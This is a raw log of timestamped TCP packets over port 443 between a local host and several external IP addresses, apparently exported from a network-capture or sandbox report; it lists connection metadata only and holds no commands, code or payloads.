                                                                                                                    May 11, 2024 00:04:15.665981054 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:15.666047096 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:15.666162968 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:15.666223049 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:15.787254095 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:15.787345886 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:15.787383080 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:15.787396908 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:15.787437916 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:15.787437916 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:15.787859917 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:15.787950039 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:15.788012028 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:15.788074017 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:15.788597107 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:15.788633108 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:15.788666964 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:15.788672924 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:15.788682938 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:15.788746119 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:15.908390045 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:15.908490896 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:15.908793926 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:15.908823967 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:15.908847094 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:15.908876896 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:15.908876896 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:15.908888102 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:15.908951044 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:16.029175997 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:16.029218912 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:16.029264927 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:16.029280901 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:16.029320002 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:16.029320002 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:16.029334068 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:16.029392958 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:16.029403925 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:16.029464960 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:16.156616926 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:16.156735897 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:16.156819105 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:16.156900883 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:16.156963110 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:16.157041073 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:16.157193899 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:16.157263994 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:16.281892061 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:16.282010078 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:16.282191992 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:16.282262087 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:16.282413960 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:16.282485008 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:16.282649994 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:16.282737970 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:16.401212931 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:16.401323080 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:16.401331902 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:16.401340961 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:16.401420116 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:16.401422977 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:16.401427984 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:16.401524067 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:16.401549101 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:16.401633024 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:16.402426004 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:16.402496099 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:16.402559042 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:16.402621984 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:16.402714014 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:16.402751923 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:16.402765989 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:16.402776003 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:16.402793884 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:16.402817011 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:16.524367094 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:16.524405956 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:16.524487019 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:16.524517059 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:16.524533033 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:16.524557114 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:16.524588108 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:16.524621964 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:16.524629116 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:16.524683952 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:16.524684906 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:16.524734020 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:16.581928968 CEST49750443192.168.2.4138.124.183.215
                                                                                                                    May 11, 2024 00:04:16.581959963 CEST44349750138.124.183.215192.168.2.4
                                                                                                                    May 11, 2024 00:04:18.800654888 CEST49753443192.168.2.454.175.181.104
                                                                                                                    May 11, 2024 00:04:18.800705910 CEST4434975354.175.181.104192.168.2.4
                                                                                                                    May 11, 2024 00:04:18.800782919 CEST49753443192.168.2.454.175.181.104
                                                                                                                    May 11, 2024 00:04:18.801140070 CEST49753443192.168.2.454.175.181.104
                                                                                                                    May 11, 2024 00:04:18.801151991 CEST4434975354.175.181.104192.168.2.4
                                                                                                                    May 11, 2024 00:04:19.006895065 CEST4434975354.175.181.104192.168.2.4
                                                                                                                    May 11, 2024 00:04:19.006954908 CEST49753443192.168.2.454.175.181.104
                                                                                                                    May 11, 2024 00:04:19.010859013 CEST49753443192.168.2.454.175.181.104
                                                                                                                    May 11, 2024 00:04:19.010878086 CEST4434975354.175.181.104192.168.2.4
                                                                                                                    May 11, 2024 00:04:19.011146069 CEST4434975354.175.181.104192.168.2.4
                                                                                                                    May 11, 2024 00:04:19.011267900 CEST49753443192.168.2.454.175.181.104
                                                                                                                    May 11, 2024 00:04:19.011759043 CEST49753443192.168.2.454.175.181.104
                                                                                                                    May 11, 2024 00:04:19.052115917 CEST4434975354.175.181.104192.168.2.4
                                                                                                                    May 11, 2024 00:04:19.605072975 CEST4434975354.175.181.104192.168.2.4
                                                                                                                    May 11, 2024 00:04:19.605142117 CEST4434975354.175.181.104192.168.2.4
                                                                                                                    May 11, 2024 00:04:19.605285883 CEST49753443192.168.2.454.175.181.104
                                                                                                                    May 11, 2024 00:04:19.605534077 CEST49753443192.168.2.454.175.181.104
                                                                                                                    May 11, 2024 00:04:19.605552912 CEST4434975354.175.181.104192.168.2.4
                                                                                                                    May 11, 2024 00:04:19.605581999 CEST49753443192.168.2.454.175.181.104
                                                                                                                    May 11, 2024 00:04:19.605693102 CEST49753443192.168.2.454.175.181.104
                                                                                                                    May 11, 2024 00:04:19.713289022 CEST49754443192.168.2.495.164.68.73
                                                                                                                    May 11, 2024 00:04:19.713349104 CEST4434975495.164.68.73192.168.2.4
                                                                                                                    May 11, 2024 00:04:19.713514090 CEST49754443192.168.2.495.164.68.73
                                                                                                                    May 11, 2024 00:04:19.713869095 CEST49754443192.168.2.495.164.68.73
                                                                                                                    May 11, 2024 00:04:19.713892937 CEST4434975495.164.68.73192.168.2.4
                                                                                                                    May 11, 2024 00:04:20.069000959 CEST4434975495.164.68.73192.168.2.4
                                                                                                                    May 11, 2024 00:04:20.069299936 CEST49754443192.168.2.495.164.68.73
                                                                                                                    May 11, 2024 00:04:20.072027922 CEST49754443192.168.2.495.164.68.73
                                                                                                                    May 11, 2024 00:04:20.072046995 CEST4434975495.164.68.73192.168.2.4
                                                                                                                    May 11, 2024 00:04:20.072290897 CEST4434975495.164.68.73192.168.2.4
                                                                                                                    May 11, 2024 00:04:20.072371006 CEST49754443192.168.2.495.164.68.73
                                                                                                                    May 11, 2024 00:04:20.072694063 CEST49754443192.168.2.495.164.68.73
                                                                                                                    May 11, 2024 00:04:20.120126009 CEST4434975495.164.68.73192.168.2.4
                                                                                                                    May 11, 2024 00:04:20.584696054 CEST4434975495.164.68.73192.168.2.4
                                                                                                                    May 11, 2024 00:04:20.584779978 CEST4434975495.164.68.73192.168.2.4
                                                                                                                    May 11, 2024 00:04:20.584791899 CEST49754443192.168.2.495.164.68.73
                                                                                                                    May 11, 2024 00:04:20.584887028 CEST49754443192.168.2.495.164.68.73
                                                                                                                    May 11, 2024 00:04:20.584928036 CEST49754443192.168.2.495.164.68.73
                                                                                                                    May 11, 2024 00:04:20.584948063 CEST4434975495.164.68.73192.168.2.4
                                                                                                                    May 11, 2024 00:04:20.584959030 CEST49754443192.168.2.495.164.68.73
                                                                                                                    May 11, 2024 00:04:20.585009098 CEST49754443192.168.2.495.164.68.73
                                                                                                                    May 11, 2024 00:04:25.662625074 CEST49755443192.168.2.495.164.68.73
                                                                                                                    May 11, 2024 00:04:25.662666082 CEST4434975595.164.68.73192.168.2.4
                                                                                                                    May 11, 2024 00:04:25.662748098 CEST49755443192.168.2.495.164.68.73
                                                                                                                    May 11, 2024 00:04:25.662981987 CEST49755443192.168.2.495.164.68.73
                                                                                                                    May 11, 2024 00:04:25.662997007 CEST4434975595.164.68.73192.168.2.4
                                                                                                                    May 11, 2024 00:04:26.007230997 CEST4434975595.164.68.73192.168.2.4
                                                                                                                    May 11, 2024 00:04:26.007307053 CEST49755443192.168.2.495.164.68.73
                                                                                                                    May 11, 2024 00:04:26.007765055 CEST49755443192.168.2.495.164.68.73
                                                                                                                    May 11, 2024 00:04:26.007776022 CEST4434975595.164.68.73192.168.2.4
                                                                                                                    May 11, 2024 00:04:26.009032011 CEST49755443192.168.2.495.164.68.73
                                                                                                                    May 11, 2024 00:04:26.009037018 CEST4434975595.164.68.73192.168.2.4
                                                                                                                    May 11, 2024 00:04:26.566164970 CEST4434975595.164.68.73192.168.2.4
                                                                                                                    May 11, 2024 00:04:26.566241980 CEST49755443192.168.2.495.164.68.73
May 11, 2024 00:04:26.566246986 CEST    443    49755    95.164.68.73    192.168.2.4
May 11, 2024 00:04:26.566293001 CEST    49755    443    192.168.2.4    95.164.68.73
May 11, 2024 00:04:26.566401958 CEST    49755    443    192.168.2.4    95.164.68.73
May 11, 2024 00:04:26.566418886 CEST    443    49755    95.164.68.73    192.168.2.4
May 11, 2024 00:04:26.566431046 CEST    49755    443    192.168.2.4    95.164.68.73
May 11, 2024 00:04:26.566463947 CEST    49755    443    192.168.2.4    95.164.68.73
May 11, 2024 00:04:28.600533009 CEST    49756    443    192.168.2.4    54.175.181.104
May 11, 2024 00:04:28.600570917 CEST    443    49756    54.175.181.104    192.168.2.4
May 11, 2024 00:04:28.600650072 CEST    49756    443    192.168.2.4    54.175.181.104
May 11, 2024 00:04:28.600826979 CEST    49756    443    192.168.2.4    54.175.181.104
May 11, 2024 00:04:28.600836039 CEST    443    49756    54.175.181.104    192.168.2.4
May 11, 2024 00:04:29.295164108 CEST    443    49756    54.175.181.104    192.168.2.4
May 11, 2024 00:04:29.295233011 CEST    49756    443    192.168.2.4    54.175.181.104
May 11, 2024 00:04:29.296261072 CEST    49756    443    192.168.2.4    54.175.181.104
May 11, 2024 00:04:29.296268940 CEST    443    49756    54.175.181.104    192.168.2.4
May 11, 2024 00:04:29.298552036 CEST    49756    443    192.168.2.4    54.175.181.104
May 11, 2024 00:04:29.298557997 CEST    443    49756    54.175.181.104    192.168.2.4
May 11, 2024 00:04:29.488142014 CEST    443    49756    54.175.181.104    192.168.2.4
May 11, 2024 00:04:29.488218069 CEST    49756    443    192.168.2.4    54.175.181.104
May 11, 2024 00:04:29.488240004 CEST    443    49756    54.175.181.104    192.168.2.4
May 11, 2024 00:04:29.488251925 CEST    443    49756    54.175.181.104    192.168.2.4
May 11, 2024 00:04:29.488281965 CEST    49756    443    192.168.2.4    54.175.181.104
May 11, 2024 00:04:29.488300085 CEST    49756    443    192.168.2.4    54.175.181.104
May 11, 2024 00:04:29.488487959 CEST    49756    443    192.168.2.4    54.175.181.104
May 11, 2024 00:04:29.488501072 CEST    443    49756    54.175.181.104    192.168.2.4
May 11, 2024 00:04:31.538259029 CEST    49757    443    192.168.2.4    138.124.183.215
May 11, 2024 00:04:31.538309097 CEST    443    49757    138.124.183.215    192.168.2.4
May 11, 2024 00:04:31.538393974 CEST    49757    443    192.168.2.4    138.124.183.215
May 11, 2024 00:04:31.539045095 CEST    49757    443    192.168.2.4    138.124.183.215
May 11, 2024 00:04:31.539060116 CEST    443    49757    138.124.183.215    192.168.2.4
May 11, 2024 00:04:31.718983889 CEST    443    49757    138.124.183.215    192.168.2.4
May 11, 2024 00:04:31.719063044 CEST    49757    443    192.168.2.4    138.124.183.215
May 11, 2024 00:04:31.733103991 CEST    49757    443    192.168.2.4    138.124.183.215
May 11, 2024 00:04:31.733115911 CEST    443    49757    138.124.183.215    192.168.2.4
May 11, 2024 00:04:31.734328032 CEST    49757    443    192.168.2.4    138.124.183.215
May 11, 2024 00:04:31.734333038 CEST    443    49757    138.124.183.215    192.168.2.4
May 11, 2024 00:04:32.381103039 CEST    443    49757    138.124.183.215    192.168.2.4
May 11, 2024 00:04:32.381189108 CEST    49757    443    192.168.2.4    138.124.183.215
May 11, 2024 00:04:32.381222010 CEST    443    49757    138.124.183.215    192.168.2.4
May 11, 2024 00:04:32.381272078 CEST    49757    443    192.168.2.4    138.124.183.215
May 11, 2024 00:04:32.381299019 CEST    443    49757    138.124.183.215    192.168.2.4
May 11, 2024 00:04:32.381340027 CEST    49757    443    192.168.2.4    138.124.183.215
May 11, 2024 00:04:32.435678959 CEST    49757    443    192.168.2.4    138.124.183.215
May 11, 2024 00:04:32.435707092 CEST    443    49757    138.124.183.215    192.168.2.4
May 11, 2024 00:04:32.435714960 CEST    49757    443    192.168.2.4    138.124.183.215
May 11, 2024 00:04:32.435760975 CEST    49757    443    192.168.2.4    138.124.183.215
May 11, 2024 00:04:35.620846033 CEST    49758    443    192.168.2.4    3.69.236.35
May 11, 2024 00:04:35.620884895 CEST    443    49758    3.69.236.35    192.168.2.4
May 11, 2024 00:04:35.620964050 CEST    49758    443    192.168.2.4    3.69.236.35
May 11, 2024 00:04:35.621238947 CEST    49758    443    192.168.2.4    3.69.236.35
May 11, 2024 00:04:35.621258020 CEST    443    49758    3.69.236.35    192.168.2.4
May 11, 2024 00:04:35.974225044 CEST    443    49758    3.69.236.35    192.168.2.4
May 11, 2024 00:04:35.974396944 CEST    49758    443    192.168.2.4    3.69.236.35
May 11, 2024 00:04:35.977263927 CEST    49758    443    192.168.2.4    3.69.236.35
May 11, 2024 00:04:35.977272034 CEST    443    49758    3.69.236.35    192.168.2.4
May 11, 2024 00:04:35.977473974 CEST    443    49758    3.69.236.35    192.168.2.4
May 11, 2024 00:04:35.977529049 CEST    49758    443    192.168.2.4    3.69.236.35
May 11, 2024 00:04:35.977814913 CEST    49758    443    192.168.2.4    3.69.236.35
May 11, 2024 00:04:36.024108887 CEST    443    49758    3.69.236.35    192.168.2.4
May 11, 2024 00:04:36.536477089 CEST    443    49758    3.69.236.35    192.168.2.4
May 11, 2024 00:04:36.536587954 CEST    49758    443    192.168.2.4    3.69.236.35
May 11, 2024 00:04:36.536607027 CEST    443    49758    3.69.236.35    192.168.2.4
May 11, 2024 00:04:36.536648989 CEST    443    49758    3.69.236.35    192.168.2.4
May 11, 2024 00:04:36.536652088 CEST    49758    443    192.168.2.4    3.69.236.35
May 11, 2024 00:04:36.536686897 CEST    49758    443    192.168.2.4    3.69.236.35
May 11, 2024 00:04:36.536729097 CEST    49758    443    192.168.2.4    3.69.236.35
May 11, 2024 00:04:36.536742926 CEST    443    49758    3.69.236.35    192.168.2.4
May 11, 2024 00:04:36.536751032 CEST    49758    443    192.168.2.4    3.69.236.35
May 11, 2024 00:04:36.536780119 CEST    49758    443    192.168.2.4    3.69.236.35
May 11, 2024 00:04:41.689709902 CEST    49759    443    192.168.2.4    95.164.68.73
May 11, 2024 00:04:41.689759970 CEST    443    49759    95.164.68.73    192.168.2.4
May 11, 2024 00:04:41.689852953 CEST    49759    443    192.168.2.4    95.164.68.73
May 11, 2024 00:04:41.690062046 CEST    49759    443    192.168.2.4    95.164.68.73
May 11, 2024 00:04:41.690076113 CEST    443    49759    95.164.68.73    192.168.2.4
May 11, 2024 00:04:42.034646988 CEST    443    49759    95.164.68.73    192.168.2.4
May 11, 2024 00:04:42.034755945 CEST    49759    443    192.168.2.4    95.164.68.73
May 11, 2024 00:04:42.035279036 CEST    49759    443    192.168.2.4    95.164.68.73
May 11, 2024 00:04:42.035290003 CEST    443    49759    95.164.68.73    192.168.2.4
May 11, 2024 00:04:42.036478996 CEST    49759    443    192.168.2.4    95.164.68.73
May 11, 2024 00:04:42.036483049 CEST    443    49759    95.164.68.73    192.168.2.4
May 11, 2024 00:04:42.521622896 CEST    443    49759    95.164.68.73    192.168.2.4
May 11, 2024 00:04:42.521697998 CEST    49759    443    192.168.2.4    95.164.68.73
May 11, 2024 00:04:42.521708965 CEST    443    49759    95.164.68.73    192.168.2.4
May 11, 2024 00:04:42.521752119 CEST    49759    443    192.168.2.4    95.164.68.73
May 11, 2024 00:04:42.521817923 CEST    49759    443    192.168.2.4    95.164.68.73
May 11, 2024 00:04:42.521836042 CEST    443    49759    95.164.68.73    192.168.2.4
May 11, 2024 00:04:42.521852016 CEST    49759    443    192.168.2.4    95.164.68.73
May 11, 2024 00:04:42.521876097 CEST    49759    443    192.168.2.4    95.164.68.73
May 11, 2024 00:04:47.553693056 CEST    49760    443    192.168.2.4    3.69.236.35
May 11, 2024 00:04:47.553729057 CEST    443    49760    3.69.236.35    192.168.2.4
May 11, 2024 00:04:47.553805113 CEST    49760    443    192.168.2.4    3.69.236.35
May 11, 2024 00:04:47.554006100 CEST    49760    443    192.168.2.4    3.69.236.35
May 11, 2024 00:04:47.554018021 CEST    443    49760    3.69.236.35    192.168.2.4
May 11, 2024 00:04:47.910607100 CEST    443    49760    3.69.236.35    192.168.2.4
May 11, 2024 00:04:47.910713911 CEST    49760    443    192.168.2.4    3.69.236.35
May 11, 2024 00:04:47.911115885 CEST    49760    443    192.168.2.4    3.69.236.35
May 11, 2024 00:04:47.911122084 CEST    443    49760    3.69.236.35    192.168.2.4
May 11, 2024 00:04:47.912341118 CEST    49760    443    192.168.2.4    3.69.236.35
May 11, 2024 00:04:47.912344933 CEST    443    49760    3.69.236.35    192.168.2.4
May 11, 2024 00:04:48.498056889 CEST    443    49760    3.69.236.35    192.168.2.4
May 11, 2024 00:04:48.498131037 CEST    443    49760    3.69.236.35    192.168.2.4
May 11, 2024 00:04:48.498161077 CEST    49760    443    192.168.2.4    3.69.236.35
May 11, 2024 00:04:48.498198986 CEST    49760    443    192.168.2.4    3.69.236.35
May 11, 2024 00:04:48.498260975 CEST    49760    443    192.168.2.4    3.69.236.35
May 11, 2024 00:04:48.498275042 CEST    443    49760    3.69.236.35    192.168.2.4
May 11, 2024 00:04:48.498286009 CEST    49760    443    192.168.2.4    3.69.236.35
May 11, 2024 00:04:48.498310089 CEST    49760    443    192.168.2.4    3.69.236.35
May 11, 2024 00:04:49.553919077 CEST    49761    443    192.168.2.4    3.69.236.35
May 11, 2024 00:04:49.553960085 CEST    443    49761    3.69.236.35    192.168.2.4
May 11, 2024 00:04:49.554033995 CEST    49761    443    192.168.2.4    3.69.236.35
May 11, 2024 00:04:49.554229021 CEST    49761    443    192.168.2.4    3.69.236.35
May 11, 2024 00:04:49.554241896 CEST    443    49761    3.69.236.35    192.168.2.4
May 11, 2024 00:04:49.905736923 CEST    443    49761    3.69.236.35    192.168.2.4
May 11, 2024 00:04:49.905863047 CEST    49761    443    192.168.2.4    3.69.236.35
May 11, 2024 00:04:50.011501074 CEST    49761    443    192.168.2.4    3.69.236.35
May 11, 2024 00:04:50.011514902 CEST    443    49761    3.69.236.35    192.168.2.4
May 11, 2024 00:04:50.012701035 CEST    49761    443    192.168.2.4    3.69.236.35
May 11, 2024 00:04:50.012706041 CEST    443    49761    3.69.236.35    192.168.2.4
May 11, 2024 00:04:50.426254034 CEST    443    49761    3.69.236.35    192.168.2.4
May 11, 2024 00:04:50.426323891 CEST    443    49761    3.69.236.35    192.168.2.4
May 11, 2024 00:04:50.426328897 CEST    49761    443    192.168.2.4    3.69.236.35
May 11, 2024 00:04:50.426367998 CEST    49761    443    192.168.2.4    3.69.236.35
May 11, 2024 00:04:50.426445007 CEST    49761    443    192.168.2.4    3.69.236.35
May 11, 2024 00:04:50.426459074 CEST    443    49761    3.69.236.35    192.168.2.4
May 11, 2024 00:04:50.426477909 CEST    49761    443    192.168.2.4    3.69.236.35
May 11, 2024 00:04:50.426498890 CEST    49761    443    192.168.2.4    3.69.236.35
May 11, 2024 00:04:54.459506989 CEST    49762    443    192.168.2.4    54.175.181.104
May 11, 2024 00:04:54.459552050 CEST    443    49762    54.175.181.104    192.168.2.4
May 11, 2024 00:04:54.459625959 CEST    49762    443    192.168.2.4    54.175.181.104
May 11, 2024 00:04:54.459827900 CEST    49762    443    192.168.2.4    54.175.181.104
May 11, 2024 00:04:54.459846973 CEST    443    49762    54.175.181.104    192.168.2.4
May 11, 2024 00:04:54.659784079 CEST    443    49762    54.175.181.104    192.168.2.4
May 11, 2024 00:04:54.659882069 CEST    49762    443    192.168.2.4    54.175.181.104
May 11, 2024 00:04:54.660497904 CEST    49762    443    192.168.2.4    54.175.181.104
May 11, 2024 00:04:54.660502911 CEST    443    49762    54.175.181.104    192.168.2.4
May 11, 2024 00:04:54.661665916 CEST    49762    443    192.168.2.4    54.175.181.104
May 11, 2024 00:04:54.661670923 CEST    443    49762    54.175.181.104    192.168.2.4
May 11, 2024 00:04:54.849919081 CEST    443    49762    54.175.181.104    192.168.2.4
May 11, 2024 00:04:54.849984884 CEST    443    49762    54.175.181.104    192.168.2.4
May 11, 2024 00:04:54.849997044 CEST    49762    443    192.168.2.4    54.175.181.104
May 11, 2024 00:04:54.850038052 CEST    49762    443    192.168.2.4    54.175.181.104
May 11, 2024 00:04:54.850593090 CEST    49762    443    192.168.2.4    54.175.181.104
May 11, 2024 00:04:54.850605965 CEST    443    49762    54.175.181.104    192.168.2.4
May 11, 2024 00:04:59.896092892 CEST    49764    443    192.168.2.4    95.164.68.73
May 11, 2024 00:04:59.896131992 CEST    443    49764    95.164.68.73    192.168.2.4
May 11, 2024 00:04:59.896218061 CEST    49764    443    192.168.2.4    95.164.68.73
May 11, 2024 00:04:59.896399975 CEST    49764    443    192.168.2.4    95.164.68.73
May 11, 2024 00:04:59.896414995 CEST    443    49764    95.164.68.73    192.168.2.4
May 11, 2024 00:05:00.251300097 CEST    443    49764    95.164.68.73    192.168.2.4
May 11, 2024 00:05:00.251435995 CEST    49764    443    192.168.2.4    95.164.68.73
May 11, 2024 00:05:00.251837969 CEST    49764    443    192.168.2.4    95.164.68.73
May 11, 2024 00:05:00.251847029 CEST    443    49764    95.164.68.73    192.168.2.4
May 11, 2024 00:05:00.253036022 CEST    49764    443    192.168.2.4    95.164.68.73
May 11, 2024 00:05:00.253041983 CEST    443    49764    95.164.68.73    192.168.2.4
May 11, 2024 00:05:00.749311924 CEST    443    49764    95.164.68.73    192.168.2.4
May 11, 2024 00:05:00.749393940 CEST    443    49764    95.164.68.73    192.168.2.4
May 11, 2024 00:05:00.749398947 CEST    49764    443    192.168.2.4    95.164.68.73
May 11, 2024 00:05:00.749443054 CEST    49764    443    192.168.2.4    95.164.68.73
May 11, 2024 00:05:00.749521017 CEST    49764    443    192.168.2.4    95.164.68.73
May 11, 2024 00:05:00.749538898 CEST    443    49764    95.164.68.73    192.168.2.4
May 11, 2024 00:05:00.749553919 CEST    49764    443    192.168.2.4    95.164.68.73
May 11, 2024 00:05:00.749593973 CEST    49764    443    192.168.2.4    95.164.68.73
May 11, 2024 00:05:02.818259001 CEST    49765    443    192.168.2.4    3.69.236.35
May 11, 2024 00:05:02.818294048 CEST    443    49765    3.69.236.35    192.168.2.4
May 11, 2024 00:05:02.818384886 CEST    49765    443    192.168.2.4    3.69.236.35
May 11, 2024 00:05:02.818598986 CEST    49765    443    192.168.2.4    3.69.236.35
May 11, 2024 00:05:02.818609953 CEST    443    49765    3.69.236.35    192.168.2.4
May 11, 2024 00:05:03.171717882 CEST    443    49765    3.69.236.35    192.168.2.4
May 11, 2024 00:05:03.171813011 CEST    49765    443    192.168.2.4    3.69.236.35
May 11, 2024 00:05:03.172238111 CEST    49765    443    192.168.2.4    3.69.236.35
May 11, 2024 00:05:03.172244072 CEST    443    49765    3.69.236.35    192.168.2.4
May 11, 2024 00:05:03.173496962 CEST    49765    443    192.168.2.4    3.69.236.35
May 11, 2024 00:05:03.173501968 CEST    443    49765    3.69.236.35    192.168.2.4
May 11, 2024 00:05:03.512689114 CEST    443    49765    3.69.236.35    192.168.2.4
May 11, 2024 00:05:03.512757063 CEST    49765    443    192.168.2.4    3.69.236.35
May 11, 2024 00:05:03.512765884 CEST    443    49765    3.69.236.35    192.168.2.4
May 11, 2024 00:05:03.512805939 CEST    49765    443    192.168.2.4    3.69.236.35
May 11, 2024 00:05:03.513014078 CEST    49765    443    192.168.2.4    3.69.236.35
May 11, 2024 00:05:03.513025999 CEST    443    49765    3.69.236.35    192.168.2.4
May 11, 2024 00:05:08.611321926 CEST    49766    443    192.168.2.4    91.194.11.183
May 11, 2024 00:05:08.611357927 CEST    443    49766    91.194.11.183    192.168.2.4
May 11, 2024 00:05:08.611412048 CEST    49766    443    192.168.2.4    91.194.11.183
May 11, 2024 00:05:08.611735106 CEST    49766    443    192.168.2.4    91.194.11.183
May 11, 2024 00:05:08.611748934 CEST    443    49766    91.194.11.183    192.168.2.4
May 11, 2024 00:05:08.827698946 CEST    443    49766    91.194.11.183    192.168.2.4
May 11, 2024 00:05:08.827804089 CEST    49766    443    192.168.2.4    91.194.11.183
May 11, 2024 00:05:09.337568045 CEST    49766    443    192.168.2.4    91.194.11.183
May 11, 2024 00:05:09.337622881 CEST    443    49766    91.194.11.183    192.168.2.4
May 11, 2024 00:05:09.338826895 CEST    49766    443    192.168.2.4    91.194.11.183
May 11, 2024 00:05:09.338831902 CEST    443    49766    91.194.11.183    192.168.2.4
May 11, 2024 00:05:10.082154989 CEST    443    49766    91.194.11.183    192.168.2.4
May 11, 2024 00:05:10.082223892 CEST    49766    443    192.168.2.4    91.194.11.183
May 11, 2024 00:05:10.082243919 CEST    443    49766    91.194.11.183    192.168.2.4
